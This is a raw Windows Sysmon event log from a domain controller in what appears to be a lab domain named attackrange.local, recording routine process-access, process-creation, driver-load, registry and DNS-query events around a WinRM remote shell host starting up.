DcomLaunch 10341000x80000000000000002654Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.586{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-42B0-6000-8000-000000009A01}4136C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002653Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.571{08A6967A-42B0-6000-8100-000000009A01}41524172C:\Windows\system32\conhost.exe{08A6967A-42B0-6000-8000-000000009A01}4136C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002652Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.555{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-42B0-6000-8100-000000009A01}4152C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002651Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.524{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002650Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.524{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002649Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.524{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002648Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.524{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002647Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.524{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002646Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.524{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002645Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.524{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002644Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.524{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002643Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.524{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002642Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.524{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-42B0-6000-8000-000000009A01}4136C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002641Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.524{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-42B0-6000-8000-000000009A01}4136C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002640Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.527{08A6967A-42B0-6000-8000-000000009A01}4136C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{08A6967A-42A5-6000-AFE1-050000000000}0x5e1af0HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{08A6967A-4287-6000-0C00-000000009A01}588C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000002639Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.524{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 644600x80000000000000002638Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:24.697C:\Windows\System32\drivers\xennet.sysMD5=7E6757CF81A305710B036475BCEDBC30,SHA256=9A5D7EAC527B6CDEC891C4A5C49FAF8599A1714078960DB87A7D72B0888A8987,IMPHASH=73F39C491797C6F3DFFBBE92FB638F34trueAmazon Web Services, Inc.Valid 10341000x80000000000000002637Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.477{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-42B0-6000-7F00-000000009A01}2580C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002636Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.461{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-42B0-6000-7F00-000000009A01}2580C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002635Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.461{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-42B0-6000-7F00-000000009A01}2580C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002634Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.461{08A6967A-4286-6000-0B00-000000009A01}8522640C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1fb7a|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+178ce|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 644600x80000000000000002633Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:24.588C:\Windows\System32\drivers\xeniface.sysMD5=F1A750612F0ED79D435FA3D149331D69,SHA256=7416108B01624EBC62D5E200818D2A0AD08B8B87D13F65FDA716F7E7358C1CB1,IMPHASH=B7B4CB7750B42CE3E3BD994E129A5D9AtrueAmazon Web Services, Inc.Valid 644600x80000000000000002632Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:24.588C:\Windows\System32\drivers\xenvif.sysMD5=E7C0450691E0B3D00FC15E823FFEB779,SHA256=5C0755A4E1F4FFD7B4A442CF5E3A8CF7F0C69B1CAA2B11C67596D77E166CA419,IMPHASH=C119D28B8420C26CE25D996F6D25FD88trueAmazon Web Services, Inc.Valid 13241300x80000000000000002631Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:07.992{08A6967A-4298-6000-3500-000000009A01}2988C:\Windows\system32\dns.exeHKLM\System\CurrentControlSet\Services\DNS\Parameters\PreviousLocalHostnamewin-dc-250.attackrange.local 10341000x80000000000000002630Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:07.992{08A6967A-4286-6000-0B00-000000009A01}8521016C:\Windows\system32\lsass.exe{08A6967A-4298-6000-3500-000000009A01}2988C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31375|C:\Windows\system32\lsasrv.dll+2f20b|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 22542200x80000000000000002717Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.460{08A6967A-4286-6000-0B00-000000009A01}852_kerberos._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002716Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.457{08A6967A-4286-6000-0B00-000000009A01}852_kerberos._tcp.dc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002715Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.453{08A6967A-4286-6000-0B00-000000009A01}852ce6ed0cf-8a10-415c-ab10-cb364afb8bb2._msdcs.attackrange.local.0type: 5 win-dc-250.attackrange.local;C:\Windows\System32\lsass.exe 22542200x80000000000000002714Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.449{08A6967A-4286-6000-0B00-000000009A01}852gc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002713Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.446{08A6967A-4286-6000-0B00-000000009A01}852_ldap._tcp.ed0423d3-3a3f-4e81-84e3-febd8a90f91a.domains._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002712Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.440{08A6967A-4286-6000-0B00-000000009A01}852_ldap._tcp.Default-First-Site-Name._sites.gc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002711Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.437{08A6967A-4286-6000-0B00-000000009A01}852_ldap._tcp.gc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002710Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.434{08A6967A-4286-6000-0B00-000000009A01}852_msdcs.attackrange.local.0type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002709Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.433{08A6967A-4286-6000-0B00-000000009A01}852_msdcs.attackrange.local.0type: 2 win-dc-250.attackrange.local;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002708Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.432{08A6967A-4286-6000-0B00-000000009A01}852_ldap._tcp.pdc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002707Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.431{08A6967A-4286-6000-0B00-000000009A01}852_kerberos._tcp.dc._msdcs.attackrange.local.0type: 33 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002706Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.423{08A6967A-4286-6000-0B00-000000009A01}852_ldap._tcp.Default-First-Site-Name._sites.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002705Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.421{08A6967A-4288-6000-1500-000000009A01}1324_ldap._tcp.Default-First-Site-Name._sites.gc._msdcs.attackrange.local.0type: 33 ;10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000002704Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.419{08A6967A-4286-6000-0B00-000000009A01}852_ldap._tcp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002703Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.417{08A6967A-4286-6000-0B00-000000009A01}852attackrange.local.0type: 2 win-dc-250.attackrange.local;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002702Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.417{08A6967A-4298-6000-3500-000000009A01}2988attackrange.local0type: 6 ;10.0.1.14;C:\Windows\System32\dns.exe 22542200x80000000000000002701Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.417{08A6967A-4298-6000-3500-000000009A01}2988attackrange.local0type: 2 win-dc-250.attackrange.local;10.0.1.14;C:\Windows\System32\dns.exe 22542200x80000000000000002700Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.416{08A6967A-4286-6000-0B00-000000009A01}852_ldap._tcp.attackrange.local.0type: 33 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002699Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.414{08A6967A-4298-6000-3500-000000009A01}2988win-dc-250.attackrange.local9501type: 6 